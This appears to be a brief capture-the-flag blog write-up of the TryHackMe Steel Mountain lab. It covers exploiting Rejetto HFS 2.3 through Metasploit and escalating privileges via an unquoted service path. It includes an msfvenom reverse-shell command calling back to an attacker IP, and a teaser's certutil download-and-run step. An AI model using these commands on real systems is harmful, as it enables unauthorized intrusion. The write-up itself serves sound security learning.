Steel Mountain - THM - Braindump

January 1, 2022•187 words

After an initial scan, there are ports that suggest this is a Windows box. There is also a web server on 80, shows an image and nothing more. Nothing found using dirbuster.

There is also another web server, on 8080. Reading the source of the page, this shows a name and a version, Rejetto HFS 2.3. There are some known RCE exploits for this specific version, one in metasploit called exploit/windows/http/rejettohfsexec, let's try this one.

Seems to work, meterpreter shell opened. We are user bill in a steelmountain domain. We can get the user flag in his desktop. Now we need a privesc vector.

We can use PowerUp loading it with meterpreter, it shows an unquoted service path escalation vector. We could have found this by running 'powershell -c "Get-Service"' as well. We can use msfvenom to create a suitable payload with the following command:

└─# msfvenom -p windows/shellreversetcp lhost=10.9.4.63 lport=2222 -f exe -o Advanced.exe

We can then upload it in the proper directory and restart the service running (in a Powershell shell):

Restart-Service -name AdvancedSystemCareService9

We are now NT authority system, job done

👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

Subscribe to the author

You'll only receive email when they publish something new.

More from emacab98
All posts

Road - THM

December 29, 2021•431 words

Road - THMThere is an SSH port open and a web server. With no credentials, the web server is a better option right now.I started by looking around the website: there is the information about who created the platform right in front of you, but I could not turn that into valuable info with a basic search. I registered an account and logged in. Snoop around the authenticated pages, and you see there is a functionality to upload a profile picture, but it is admin-only. However, this tells us the ema...

Read post

Alfred - THM - Braindump

January 1, 2022•198 words

There are two web servers, one on 80 revealing an email address, and one on 8080 that is a Jenkins login page. Jenkins has, notoriously, a poor password policy.Searching on Google, default is admin. Tried simple combinations, admin:admin worked.We can modify the configuration for the existing project and insert a build command to run when building it, we can try to launch a reverse shell from it.We can use this command in the build:certutil.exe -urlcache -split -f http://10.9.4.63:8000/Advanced....

Read post

Steel Mountain - THM - Braindump

More from emacab98All posts

Road - THM

Alfred - THM - Braindump

More from emacab98
All posts